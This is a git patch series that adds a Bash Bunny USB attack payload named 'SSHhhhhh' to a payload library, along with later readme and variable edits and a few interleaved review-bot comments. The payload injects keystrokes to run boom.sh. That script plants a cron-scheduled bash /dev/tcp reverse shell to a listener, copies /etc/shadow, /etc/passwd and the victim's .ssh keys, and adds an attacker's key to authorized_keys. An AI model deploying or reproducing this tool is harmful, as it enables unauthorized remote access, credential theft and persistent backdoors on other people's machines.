From 3ed306ef999d0b3d1a2d842f20287d4de6b9c9de Mon Sep 17 00:00:00 2001
From: WWVB <48934034+WWVB@users.noreply.github.com>
Date: Tue, 26 Mar 2019 08:51:04 -0400
Subject: [PATCH 01/15] Added SSHhhhhh (Linux) to the library

Plant your RSA key into the victim's authorized_keys, schedule a reverse shell via CRON and grab the contents of the .ssh folder.
---
 .../remote_access/SSHhhhhh (Linux)/boom.sh | 47 +++++++++++++++++
 .../SSHhhhhh (Linux)/payload.txt | 52 +++++++++++++++++++
 .../remote_access/SSHhhhhh (Linux)/readme.md | 24 +++++++++
 3 files changed, 123 insertions(+)
 create mode 100644 payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh
 create mode 100644 payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt
 create mode 100644 payloads/library/remote_access/SSHhhhhh (Linux)/readme.md

diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh
new file mode 100644
index 00000000..11ecc635
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh
@@ -0,0 +1,47 @@
+#!/bin/bash
+
+# Main Payload
+
+# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..
+REVERSESHELL=true
+LHOST='10.20.20.104' # Reverse Shell listening host IP
+LPORT='4444' # Reverse Shell listening host port
+CRON='30 */1 * * *' # Just the timing portion of the CRON job
+RSA_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkmgAxtb8fYA7Bbk+Cs0X+gR43gYbbzdHg7AesoOF5Q95mcbiL7mu79FG4fO7Tnrtl2ARCFJZo8bphbEiSVC/zMPNqgP0trXJld2vbbpRWT8vMsysT4dgAssp9zosJdIR7y0akKByglcVPcaCub/KcQo1mtOq/HNkJ8DOmBeLNHYsL6X0HG2Zccid21DQq4dTMnKAqQrJUCPNRrE2tAx/C0E8SsVtq3cjp6T0H8AINLaHUnmAAI02PLjCZeQ6xUqnpAhgPMymwpjQ66O5EM+Vf5UlhFULn0jmlVnhxNULvYQHfRLY6YhTgVVPSxNUp+sWhyRJ1tx0nAEoJh82gwJ7J engineering@kali-2'
+ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces
+DT=$(date "+%Y.%m.%d-%H.%M.%S")
+DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT
+
+if [ "$REVERSESHELL" = true ] ; then
+ # Create reverse shell script
+ echo "#!/bin/bash"> .config/rs.sh ;
+ echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ;
+ chmod +x /home/$USER/.config/rs.sh ;
+
+ # Add task to CRON that launches the Reverse_TCP script on a schedule for persistence
+ crontab -l > crontab.tmp ;
+ if grep -Fq .config/rs.sh crontab.tmp; then
+ echo 'Update in progress.'
+ else
+ echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ;
+ crontab crontab.tmp ;
+ fi
+ rm -f crontab.tmp ;
+fi
+
+# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later)
+mkdir $DN ;
+ip addr > $DN/ip-addr.txt ;
+whoami > $DN/whoami.txt ;
+cat /etc/passwd > $DN/etc-passwd.txt ;
+cat /etc/shadow > $DN/etc-shadow.txt ;
+uname -a > $DN/uname-a.txt ;
+route -n > $DN/route-n.txt ;
+cp /home/$USER/.ssh/* $DN/. ;
+
+# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence
+if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then
+ echo 'Update almost completed.'
+else
+ echo $RSA_KEY >> .ssh/authorized_keys ;
+fi
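Review bot: The comment `# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..` does not describe the code under it: what the block writes into `.config/rs.sh` is a plain `bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1` redirect, and nothing else in this file produces or expects a Meterpreter payload. Suggest `# Variables for the bash /dev/tcp reverse shell (LHOST/LPORT), its CRON schedule, and the attacker's SSH public key`. In the same block `RSA_KEY` is a complete public key with an identifying comment and `LHOST` is a lab address, so both read as real operator values rather than placeholders; a comment stating that every value in this block must be replaced before use would make that explicit.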
diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt
new file mode 100644
index 00000000..e7548d8e
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt
@@ -0,0 +1,52 @@
+# Title: SSHhhhhh
+# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
+# Author: WWVB
+# Props: Hak5Darren
+# Version: 1.0
+# Category: Exfiltration w/Persistence
+# Target: Linux Ubuntu 18.04 LTS
+# Attackmodes: HID, Storage
+
+#!/bin/bash
+
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+LED STAGE1
+QUACK DELAY 500
+QUACK CTRL-ALT t
+QUACK DELAY 100
+
+# Drop primary payload on the box
+QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh .
+QUACK ENTER
+QUACK DELAY 50
+
+QUACK STRING chmod +x boom.sh
+QUACK ENTER
+QUACK DELAY 50
+
+LED ATTACK
+
+# Light the fuse and wait!!
+QUACK STRING ./boom.sh
+QUACK ENTER
+QUACK DELAY 1000
+
+# Cleanup
+LED CLEANUP
+QUACK STRING rm boom.sh
+QUACK ENTER
+QUACK DELAY 100
+
+# Bye Felicia!
+QUACK STRING umount '/media/$USER/BashBunny'
+QUACK ENTER
+QUACK DELAY 25
+
+QUACK STRING exit
+QUACK ENTER
+QUACK DELAY 25
+
+LED FINISH
diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md
new file mode 100644
index 00000000..1eb09821
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md
@@ -0,0 +1,24 @@
+# SSHhhhhh
+
+# Author: WWVB
+# Version: Version 1.0
+
+# Description
+
+# Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS)
+ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major])
+
+# Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..)
+ whoami
+ ip addr
+ route -n
+ /etc/passwd
+ /etc/shadow (on the off chance you get a root terminal)
+ uname -a
+
+ Two opportunites for persistence are injected:
+ Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You)
+ Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job
+ added that calls it on a schedule (aka Call Me Later)
+
+# Configuration = HID STORAGE

From c52ce015de9bb83d31a1486783e3ec665dca704d Mon Sep 17 00:00:00 2001
From: WWVB <48934034+WWVB@users.noreply.github.com>
Date: Tue, 26 Mar 2019 08:52:28 -0400
Subject: [PATCH 02/15] Update readme.md

---
 .../library/remote_access/SSHhhhhh (Linux)/readme.md | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md
index 1eb09821..7d6889f2 100644
--- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md
@@ -1,14 +1,14 @@ # SSHhhhhh -# Author: WWVB -# Version: Version 1.0 +## Author: WWVB +## Version: Version 1.0 -# Description +## Description -# Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) +## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) -# Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) +## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) whoami ip addr route -n @@ -21,4 +21,4 @@ Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) -# Configuration = HID STORAGE +## Configuration = HID STORAGE From 3ee2668f7e2c4a480302fb1e0725ea0356cd60d7 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:53:57 -0400 Subject: [PATCH 03/15] Update readme.md --- .../remote_access/SSHhhhhh (Linux)/readme.md | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 7d6889f2..8ef28aba 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md 
@@ -6,19 +6,19 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) - Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) - whoami - ip addr - route -n - /etc/passwd - /etc/shadow (on the off chance you get a root terminal) - uname -a +whoami +ip addr +route -n +/etc/passwd +/etc/shadow (on the off chance you get a root terminal) +uname -a - Two opportunites for persistence are injected: - Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) - Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job - added that calls it on a schedule (aka Call Me Later) +Two opportunites for persistence are injected: +Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) +Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job + added that calls it on a schedule (aka Call Me Later) ## Configuration = HID STORAGE From d31b0174b74cbd55e977cb9790a4ab5e5881652d Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:56:37 -0400 Subject: [PATCH 04/15] Update readme.md --- .../library/remote_access/SSHhhhhh (Linux)/readme.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 8ef28aba..f2e59109 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md 
@@ -9,12 +9,12 @@ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) -whoami -ip addr -route -n -/etc/passwd -/etc/shadow (on the off chance you get a root terminal) -uname -a + whoami + ip addr + route -n + /etc/passwd + /etc/shadow (on the off chance you get a root terminal) + uname -a Two opportunites for persistence are injected: Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) From fa33a23a72af1b1c957ad682682592f22ab16716 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:57:48 -0400 Subject: [PATCH 05/15] Update readme.md --- .../remote_access/SSHhhhhh (Linux)/readme.md | 21 +++++++++---------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index f2e59109..8a2e74d0 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md 
@@ -6,19 +6,18 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) -Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +###Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) - whoami - ip addr - route -n - /etc/passwd - /etc/shadow (on the off chance you get a root terminal) - uname -a +### whoami +### ip addr +### route -n +### /etc/passwd +### /etc/shadow (on the off chance you get a root terminal) +### uname -a -Two opportunites for persistence are injected: -Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) -Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job - added that calls it on a schedule (aka Call Me Later) +###Two opportunites for persistence are injected: +###Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) +###Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) ## Configuration = HID STORAGE From 32d7801f0ea4c01e9576bbf8fc4d841f3af79eae Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:59:09 -0400 Subject: [PATCH 06/15] Update readme.md --- .../remote_access/SSHhhhhh (Linux)/readme.md | 25 ++++++++++++------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 8a2e74d0..d679a838 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md 
@@ -9,15 +9,22 @@ ###Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) -### whoami -### ip addr -### route -n -### /etc/passwd -### /etc/shadow (on the off chance you get a root terminal) -### uname -a + whoami + + ip addr + + route -n + + /etc/passwd + + /etc/shadow (on the off chance you get a root terminal) + + uname -a -###Two opportunites for persistence are injected: -###Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) -###Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) +Two opportunites for persistence are injected: + + Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) + + Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) ## Configuration = HID STORAGE From 470fd8a0cea1f41a562d062fac6dd76dfe40ee4c Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 09:00:28 -0400 Subject: [PATCH 07/15] Update readme.md --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index d679a838..efa9e49e 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md 
@@ -6,7 +6,7 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) -###Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) whoami @@ -21,7 +21,7 @@ uname -a -Two opportunites for persistence are injected: +##Two opportunites for persistence are injected: Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) From 40a9afa7c47a8d343ef3314a59e4ce3ef0d2eaae Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 09:01:09 -0400 Subject: [PATCH 08/15] Update readme.md --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index efa9e49e..944aaaf9 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -21,7 +21,7 @@ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not install uname -a -##Two opportunites for persistence are injected: +## Two opportunites for persistence are injected: Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) From 230a677aa3acf64fa31f1ae1c5d087234f047b23 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 09:42:49 -0400 Subject: [PATCH 09/15] Update readme.md --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 944aaaf9..5fdc0c34 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -6,7 +6,7 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) -Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) whoami From f9d4737fc0f4cc2d5c77fbee5f4fe83b5fdb12cc Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Thu, 28 Mar 2019 10:30:47 -0400 Subject: [PATCH 10/15] Added ARP data to the loot --- payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh index 11ecc635..a1b7fc82 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh @@ -33,6 +33,7 @@ fi mkdir $DN ; ip addr > $DN/ip-addr.txt ; whoami > $DN/whoami.txt ; +cat /proc/net/arp > $DN/arp.txt ; cat /etc/passwd > $DN/etc-passwd.txt ; cat /etc/shadow > $DN/etc-shadow.txt ; uname -a > $DN/uname-a.txt ; From 16efe8b05beeb54957e2c5675b5d553444d184a1 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Thu, 28 Mar 2019 10:31:55 -0400 Subject: [PATCH 11/15] Added ARP to loot --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 2 ++ 1 file changed, 2 insertions(+) 
diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 5fdc0c34..8f1064aa 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -13,6 +13,8 @@ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not install ip addr + arp data + route -n /etc/passwd From 83f8d9cb43e35c533c3c2b96a8725e7a3d7637bc Mon Sep 17 00:00:00 2001 From: WWVB Date: Thu, 27 Jun 2019 20:20:28 -0400 Subject: [PATCH 12/15] Renamed directory to remove space. --- .../remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/boom.sh | 0 .../{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/payload.txt | 0 .../{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/readme.md | 0 3 files changed, 0 insertions(+), 0 deletions(-) rename payloads/library/remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/boom.sh (100%) rename payloads/library/remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/payload.txt (100%) rename payloads/library/remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/readme.md (100%) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh similarity index 100% rename from payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh rename to payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt similarity index 100% rename from payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt rename to payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt 
diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md similarity index 100% rename from payloads/library/remote_access/SSHhhhhh (Linux)/readme.md rename to payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md From 1c2199298a07fd6ccd9aa02943c83da8ca7ff760 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Sat, 24 Aug 2024 09:49:52 -0400 Subject: [PATCH 13/15] Update payload.txt Added BashBunny drive label variable as suggested by @hak5peaks --- .../library/remote_access/SSHhhhhh-(Linux)/payload.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt index e7548d8e..3509faa1 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt @@ -1,12 +1,14 @@ # Title: SSHhhhhh # Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors # Author: WWVB -# Props: Hak5Darren -# Version: 1.0 +# Props: Hak5Darren, hak5peaks +# Version: 1.1 # Category: Exfiltration w/Persistence # Target: Linux Ubuntu 18.04 LTS # Attackmodes: HID, Storage +DRIVE_LABEL="BashBunny" + #!/bin/bash LED SETUP @@ -19,7 +21,7 @@ QUACK CTRL-ALT t QUACK DELAY 100 # Drop primary payload on the box -QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh . +QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh . QUACK ENTER QUACK DELAY 50 From e9a07640013dfcfcd2c10dc420a03147ef9b6b74 Mon Sep 17 00:00:00 2001 
From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Mon, 26 Aug 2024 19:46:23 -0400 Subject: [PATCH 14/15] Update boom.sh Set the RSA_KEY variable to a placeholder value, with instructions as to how the RSA public key info is found, per @hak5peaks suggestion --- payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh index a1b7fc82..82643fc0 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh @@ -3,11 +3,11 @@ # Main Payload # Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc.. +RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named REVERSESHELL=true LHOST='10.20.20.104' # Reverse Shell listening host IP LPORT='4444' # Reverse Shell listening host port CRON='30 */1 * * *' # Just the timing portion of the CRON job -RSA_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkmgAxtb8fYA7Bbk+Cs0X+gR43gYbbzdHg7AesoOF5Q95mcbiL7mu79FG4fO7Tnrtl2ARCFJZo8bphbEiSVC/zMPNqgP0trXJld2vbbpRWT8vMsysT4dgAssp9zosJdIR7y0akKByglcVPcaCub/KcQo1mtOq/HNkJ8DOmBeLNHYsL6X0HG2Zccid21DQq4dTMnKAqQrJUCPNRrE2tAx/C0E8SsVtq3cjp6T0H8AINLaHUnmAAI02PLjCZeQ6xUqnpAhgPMymwpjQ66O5EM+Vf5UlhFULn0jmlVnhxNULvYQHfRLY6YhTgVVPSxNUp+sWhyRJ1tx0nAEoJh82gwJ7J engineering@kali-2' ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces DT=$(date "+%Y.%m.%d-%H.%M.%S") DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT From 70eac91d25c738e43a32448cac4d7d45e3d052a3 Mon Sep 17 00:00:00 2001 
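Review bot: `ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces` is left as is while the key it refers to becomes `RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY'`, so the comment now points at a value that no longer exists in the file and the variable keeps a default that cannot match the placeholder. Since the two are read together by the authorized_keys check further down in boom.sh (outside this hunk), the comment should say they must be changed as a pair, e.g. `ATTACKER_HOST='PLACEHOLDER-FOR-KEY-COMMENT' # must equal the trailing comment field of RSA_KEY above; update both together. Do not include spaces`. `LHOST` and `LPORT` in the same block keep lab-specific defaults; marking them as placeholders too would be consistent with what this commit does for RSA_KEY.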
From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Mon, 26 Aug 2024 19:52:49 -0400 Subject: [PATCH 15/15] Update payload.txt Implemented the $DRIVE_LABEL variable into the umount command, per @hak5peaks suggestion --- payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt index 3509faa1..1033e110 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt @@ -43,7 +43,7 @@ QUACK ENTER QUACK DELAY 100 # Bye Felicia! -QUACK STRING umount '/media/$USER/BashBunny' +QUACK STRING umount '/media/$USER/$DRIVE_LABEL' QUACK ENTER QUACK DELAY 25